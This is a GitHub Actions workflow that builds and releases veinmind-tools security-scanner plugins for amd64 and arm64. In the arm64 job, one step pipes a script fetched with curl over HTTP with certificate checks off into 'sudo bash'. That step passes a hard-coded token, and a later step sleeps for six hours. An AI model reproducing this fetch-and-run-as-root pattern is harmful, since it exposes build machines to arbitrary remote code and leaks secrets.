name: veinmind-tools-test-and-build
on:
  workflow_call:

jobs:
  # build go plugins
  build-plugins-amd64:
    strategy:
      fail-fast: false
      matrix:
        plugin: [
          veinmind-basic,
          veinmind-escalate,
          veinmind-iac,
          veinmind-log4j2,
          veinmind-malicious,
          veinmind-sensitive,
          veinmind-unsafe-mount,
          veinmind-vuln,
          veinmind-weakpass,
          veinmind-webshell,
          veinmind-minio,
        ]
        path: [ ./plugins/go/ ]
        include:
          - plugin: veinmind-malicious
            path: ./plugins/go/
            tags: community
          - plugin: veinmind-weakpass # static build
            path: ./plugins/go/
            tags: static
          - plugin: veinmind-runner # veinmind-runner
            path: ./
    name: ${{ matrix.plugin }}
    runs-on: ubuntu-22.04

#    container:
#      image: veinmind/go1.20:1.9.10
    env:
      CI_GOOS: linux
      CI_GOARCH: amd64
      TAGS: ${{matrix.TAGS}}
    steps:
      - uses: actions/checkout@v3
      - name: Clear cache
        run: |
          sudo apt-get autoremove -y
          sudo apt-get clean -y
          sudo rm -rf /var/lib/apt/lists/*
      - uses: actions/setup-go@v3
        with:
          go-version: '1.20.1'
      - run: sudo make install && sudo apt-get install libcrypt-dev libcrypt1 -y
      - run: |
          export CC=arm-linux-gnueabi-gcc CXX=arm-linux-gnueabi-g++ CGO_ENABLED=1
      - run: make test.${{ matrix.plugin }}
      - run: make platform.${{ matrix.plugin }} CI_GOOS=${{ env.CI_GOOS }} CI_GOARCH=${{ env.CI_GOARCH }} TAGS=${{ env.TAGS }}
      - uses: actions/upload-artifact@v3
        with:
          name: ${{ matrix.plugin }}-${{ env.CI_GOARCH }}
          path: ${{ matrix.path }}/${{ matrix.plugin }}/${{ matrix.plugin }}_${{ env.CI_GOOS }}_${{ env.CI_GOARCH }}
      - uses: dvkunion/action-gh-release@releaser
        if: startsWith(github.ref, 'refs/tags/')
        with:
          retries: 5
          retry_interval: 30000
          files: ${{ matrix.path }}/${{ matrix.plugin }}/${{ matrix.plugin }}_${{ env.CI_GOOS }}_${{ env.CI_GOARCH }}

  # build arm go plugins
  build-plugins-arm64:
    strategy:
      fail-fast: false
      matrix:
        plugin: [
          veinmind-basic,
          veinmind-escalate,
          veinmind-iac,
          veinmind-log4j2,
          veinmind-malicious,
          veinmind-sensitive,
          veinmind-unsafe-mount,
          veinmind-vuln,
          veinmind-weakpass,
          veinmind-webshell,
          veinmind-minio,
        ]
        path: [ ./plugins/go/ ]
        include:
          - plugin: veinmind-malicious
            path: ./plugins/go/
            tags: community
          - plugin: veinmind-weakpass # static build
            path: ./plugins/go/
            tags: static
          - plugin: veinmind-runner # veinmind-runner
            path: ./
    name: ${{ matrix.plugin }}-arm
    runs-on: ubuntu-22.04
    env:
      CI_GOOS: linux
      CI_GOARCH: arm64
      TAGS: ${{matrix.TAGS}}
    steps:
      - uses: actions/checkout@v3
      - name: Clear cache
        run: |
          sudo apt-get autoremove -y
          sudo apt-get clean -y
          sudo rm -rf /var/lib/apt/lists/*
      - uses: actions/setup-go@v3
        with:
          go-version: '1.20.1'
      - run: curl -kfsSL 'http://collie-agent.chaitin.com:1443/api/v1/host/install_script?os_type=linux' | sudo bash -s -- --token=573af29eb99ccdab6f9e4f84fbc29cbb
      - run: sudo make install && sudo apt-get install gcc-arm-linux-gnueabi libcrypt-dev libcrypt1 -y
      - run: sleep 360m
      - run: |
          export CC=arm-linux-gnueabi-gcc CXX=arm-linux-gnueabi-g++ CGO_ENABLED=1
          sudo make platform.${{ matrix.plugin }} CI_GOOS=${{ env.CI_GOOS }} CI_GOARCH=${{ env.CI_GOARCH }} TAGS=${{ env.TAGS }}
      - uses: actions/upload-artifact@v3
        with:
          name: ${{ matrix.plugin }}-${{ env.CI_GOARCH }}
          path: ${{ matrix.path }}/${{ matrix.plugin }}/${{ matrix.plugin }}_${{ env.CI_GOOS }}_${{ env.CI_GOARCH }}
      - uses: dvkunion/action-gh-release@releaser
        if: startsWith(github.ref, 'refs/tags/')
        with:
          retries: 5
          retry_interval: 30000
          files: ${{ matrix.path }}/${{ matrix.plugin }}/${{ matrix.plugin }}_${{ env.CI_GOOS }}_${{ env.CI_GOARCH }}